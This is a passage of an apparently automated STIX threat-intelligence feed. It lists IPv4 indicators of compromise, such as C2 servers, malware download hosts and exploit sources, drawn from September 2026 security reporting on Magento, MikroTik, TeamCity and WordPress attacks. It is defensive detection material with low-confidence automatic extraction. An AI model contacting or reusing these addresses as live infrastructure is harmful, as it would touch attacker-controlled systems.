addre","pattern":"[ipv4-addr:value = '193.233.202.17']","pattern_type":"stix","valid_from":"2026-09-08T12:10:57.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-disable-endpoint-protection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0ad33b0-f8b7-4357-ace6-63bb0629dd03","created":"2026-09-08T12:10:57.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 77.110.126.46","description":"Seen in \"Hackers Disable Endpoint Protection and Deploy Sliver Across Compromised Windows Domain\" (Cyber Security News). Context: command-and-control and staging-server address IPv4 address 77.110.126.46 Hardcoded third-tier fallback address, designated hunt-only","pattern":"[ipv4-addr:value = '77.110.126.46']","pattern_type":"stix","valid_from":"2026-09-08T12:10:57.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-disable-endpoint-protection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d276eec2-7ef7-4858-9ce8-40f9cd7aa3d3","created":"2026-09-08T11:36:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 99.84.67.186","description":"Seen in \"Adobe Commerce max-severity bug comes under active attack\" (CSO Online). Context: launched. This is a small Rust program that connects to the 99.84.67.186 C2 server and waits for commands,” Sansec researchers said","pattern":"[ipv4-addr:value = '99.84.67.186']","pattern_type":"stix","valid_from":"2026-09-08T11:36:48.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4219626/adobe-commerce-max-severity-bug-comes-under-active-attack.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cffbd237-3ce5-4393-a58e-666c8f7162dd","created":"2026-09-08T11:15:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 82.192.72.4","description":"Seen in \"MikroTik Patches Critical Flaws Chained to Hack Routers\" (SecurityWeek). Context: attacks have been originating from two IP addresses, namely 82.192.72.4 and 103.102.31.18. “The presence of any of these artifacts","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-08T11:15:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/mikrotik-patches-critical-flaws-chained-to-hack-routers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d599903c-8b52-4c4d-9ed8-48fb13ebcd5c","created":"2026-09-08T10:37:58.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.234.64.0","description":"Seen in \"N-able Patches Critical Zero-Day in N-central\" (SecurityWeek). Context: ctivity. We’ve observed scans originating from the IP range 23.234.64.0/18 attempting to exploit this vulnerability. Check your log","pattern":"[ipv4-addr:value = '23.234.64.0']","pattern_type":"stix","valid_from":"2026-09-08T10:37:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/n-able-patches-critical-zero-day-in-n-central/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--484f977a-848d-45ed-a57e-9fea61a0c4f1","created":"2026-09-08T10:24:30.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.230.249.49","description":"Seen in \"HVNC Backdoor Targets LATAM Organizations with Fake Tax and DocuSign Lures\" (ANY.RUN). Context: : 02 19 05 04 07 19 05 03 0E 19 03 0E XOR key: 0x37 Result: 5.230.249.49 The destination port is stored in plaintext: 27015 – the de","pattern":"[ipv4-addr:value = '5.230.249.49']","pattern_type":"stix","valid_from":"2026-09-08T10:24:30.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"ANY.RUN","url":"https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--539965f1-9fea-4b85-82a7-c985ad417252","created":"2026-09-07T17:49:08.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.157.160.251","description":"Seen in \"StyleSmuggler: The Magento Zero-Day Behind New Store Attacks\" (Security Affairs). Context: TP-like domains and UDP port 123 destinations, particularly 185.157.160.251 , which Sansec linked to the observed domains on September","pattern":"[ipv4-addr:value = '185.157.160.251']","pattern_type":"stix","valid_from":"2026-09-07T17:49:08.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/198603/uncategorized/stylesmuggler-the-magento-zero-day-behind-new-store-attacks.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a7c3456d-2cb7-4be0-8468-5f1d459c08ba","created":"2026-09-07T14:36:07.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.102.31.18","description":"Seen in \"⚡ Weekly Recap: Chrome 0-Day, Router Hijacks, Coder Supply Chain Attack and More\" (The Hacker News). Context: September,\" CERT Polska said. \"In addition, the IP address 103.102.31.18 was used in attempts to exploit the described chain.\" Unpat","pattern":"[ipv4-addr:value = '103.102.31.18']","pattern_type":"stix","valid_from":"2026-09-07T14:36:07.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/weekly-recap-chrome-0-day-router.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bfd801fb-0b27-450b-8b40-0f1a91029bfd","created":"2026-09-07T14:36:07.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 82.192.72.4","description":"Seen in \"⚡ Weekly Recap: Chrome 0-Day, Router Hijacks, Coder Supply Chain Attack and More\" (The Hacker News). Context: eation of the 'ops' account, originated from the IP address 82.192.72.4 and have been occurring since at least 2 September,\" CERT P","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-07T14:36:07.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/weekly-recap-chrome-0-day-router.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29f873aa-7f21-4fc1-a587-efcf69fca27d","created":"2026-09-07T10:32:40.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.102.31.18","description":"Seen in \"Hackers exploit new MikroTik RouterOS flaws to hijack routers\" (BleepingComputer). Context: ccount 82.192.72.4 — linked to confirmed successful attacks 103.102.31.18 — observed attempting to exploit MikroTrick If compromise i","pattern":"[ipv4-addr:value = '103.102.31.18']","pattern_type":"stix","valid_from":"2026-09-07T10:32:40.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-exploit-new-mikrotik-routeros-flaws-to-hijack-routers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--816886af-cd8c-473e-95d2-7adda9b4099b","created":"2026-09-07T10:32:40.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 82.192.72.4","description":"Seen in \"Hackers exploit new MikroTik RouterOS flaws to hijack routers\" (BleepingComputer). Context: by ssh:-2@<ip>’ Presence of a highly privileged ops account 82.192.72.4 — linked to confirmed successful attacks 103.102.31.18 — ob","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-07T10:32:40.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-exploit-new-mikrotik-routeros-flaws-to-hijack-routers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c7c9ac95-761a-406e-8541-b59f5ca3073c","created":"2026-09-07T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.102.31.18","description":"Seen in \"Hackers exploit RouterOS flaws to hijack MikroTik devices without authentication\" (Help Net Security). Context: ince at least September 2, and it flagged a second address, 103.102.31.18, used in attempts to exploit the same chain. Patches and de","pattern":"[ipv4-addr:value = '103.102.31.18']","pattern_type":"stix","valid_from":"2026-09-07T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/07/mikrotik-routeros-ssh-vulnerabilities-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--87078c7b-c02c-496b-8245-bf2f2ec93c63","created":"2026-09-07T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 82.192.72.4","description":"Seen in \"Hackers exploit RouterOS flaws to hijack MikroTik devices without authentication\" (Help Net Security). Context: including creation of that “ops” account, to the IP address 82.192.72.4, active since at least September 2, and it flagged a second","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-07T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/07/mikrotik-routeros-ssh-vulnerabilities-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7fe01303-2bb6-478b-98ca-220ca329a1d7","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 150.109.230.104","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: P addresses associated with observed exploitation activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205","pattern":"[ipv4-addr:value = '150.109.230.104']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8831c244-1cd8-4db8-9718-11991e0627cf","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 152.233.30.18","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication or other activity from unexpected IP address","pattern":"[ipv4-addr:value = '152.233.30.18']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f844b890-3e11-4a0b-b97f-3bccf288a39c","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 15.235.225.205","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: 50.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication or other activity from unexpec","pattern":"[ipv4-addr:value = '15.235.225.205']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b67f9529-4808-4b3b-ab5a-b2dd1a63cbab","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 210.247.242.190","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: tion activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication or other activi","pattern":"[ipv4-addr:value = '210.247.242.190']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a279483-573b-4e4c-b1c3-414fcedf9672","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 43.153.227.206","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: ciated with observed exploitation activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18","pattern":"[ipv4-addr:value = '43.153.227.206']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca06b38e-2c2e-46f7-af80-978ac86e087e","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 62.210.127.48","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: erved exploitation activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication","pattern":"[ipv4-addr:value = '62.210.127.48']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5746d1cd-3330-475b-903b-1abf00e5643c","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 182.182.152.48","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: ces 88.216.72.181 attacker source, seen at multiple victims 182.182.152.48 attacker source 76.31.99.207 attacker source, failed exploi","pattern":"[ipv4-addr:value = '182.182.152.48']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25616ab9-4750-438c-86d9-ec5eda8ae64e","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.157.160.251","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: tember 7 that name, and ntp.timesysnc.net , both resolve to 185.157.160.251 , which is the address to block if you cannot filter by nam","pattern":"[ipv4-addr:value = '185.157.160.251']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--640680a7-933c-45c6-bbc9-4a5018ea2a4a","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 209.141.43.95","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: axfileupload/mag.txt 247.cdnflare.xyz malware download host 209.141.43.95 malware download host # C2 servers 99.84.67.186:443 C2, Web","pattern":"[ipv4-addr:value = '209.141.43.95']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e7efeb2-ddce-4839-af56-826aa2a57a52","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 209.73.130.148","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: source 76.31.99.207 attacker source, failed exploit attempt 209.73.130.148 attacker source, successful exploit attempt 77.239.124.107","pattern":"[ipv4-addr:value = '209.73.130.148']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f2f7cad9-722a-4e9f-a3c6-ef60201cb359","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 76.31.99.207","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: ce, seen at multiple victims 182.182.152.48 attacker source 76.31.99.207 attacker source, failed exploit attempt 209.73.130.148 atta","pattern":"[ipv4-addr:value = '76.31.99.207']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1c5e926-3abd-4fc3-8e90-546643fc4dbc","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 77.239.124.107","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: 209.73.130.148 attacker source, successful exploit attempt 77.239.124.107 attacker source, follow-up requests User-Agent: python-requ","pattern":"[ipv4-addr:value = '77.239.124.107']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68429ba7-5d2a-49b7-ab7f-f02be8efee86","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 88.216.72.181","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: llback ntp.syncstime.to:123 C2, fallback # attacker sources 88.216.72.181 attacker source, seen at multiple victims 182.182.152.48 at","pattern":"[ipv4-addr:value = '88.216.72.181']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad67442d-e466-4a99-b7bd-4b56fa1ed589","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 99.84.67.186","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: launched. This is a small Rust program that connects to the 99.84.67.186 C2 server and waits for commands. So far, we have no indica","pattern":"[ipv4-addr:value = '99.84.67.186']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--48ece89a-7de0-417d-b135-4c840ed350f6","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.154.152.178","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: he following IP addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.","pattern":"[ipv4-addr:value = '103.154.152.178']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef58fff0-d330-4056-9973-97af1d836730","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.164.182.122","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said to have begun on","pattern":"[ipv4-addr:value = '103.164.182.122']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4db82aff-4852-49a5-b937-dfffca14c6dd","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.168.146.131","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: riginated from the following IP addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 12","pattern":"[ipv4-addr:value = '103.168.146.131']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8263945-af85-4133-8237-bd2a3c011587","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.168.147.235","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: ms plugin have originated from the following IP addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51","pattern":"[ipv4-addr:value = '103.168.147.235']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e35d0a73-fd97-448d-96dc-b8c13021e150","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.170.97.7","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 1","pattern":"[ipv4-addr:value = '103.170.97.7']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--deab3d49-5c92-4062-ae6c-597d475bacc8","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.84.230.85","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: the below IP addresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.1","pattern":"[ipv4-addr:value = '103.84.230.85']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--917ddead-fda6-4f14-b2f3-769060e86126","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 103.90.148.202","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: ddresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.25","pattern":"[ipv4-addr:value = '103.90.148.202']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7cb33a61-e6a6-4c0c-bf29-2d3235f3308c","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 114.10.17.253","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 3.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d19::1 WordPress site owners usi","pattern":"[ipv4-addr:value = '114.10.17.253']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d651dc54-6128-47bb-81b9-c20d89b92e93","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 114.10.45.151","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 16.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d19::1 WordPress site owners using the two plu","pattern":"[ipv4-addr:value = '114.10.45.151']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fea17bfe-256c-47b0-b46c-5513698660e7","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 129.227.46.143","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 31 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious act","pattern":"[ipv4-addr:value = '129.227.46.143']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker 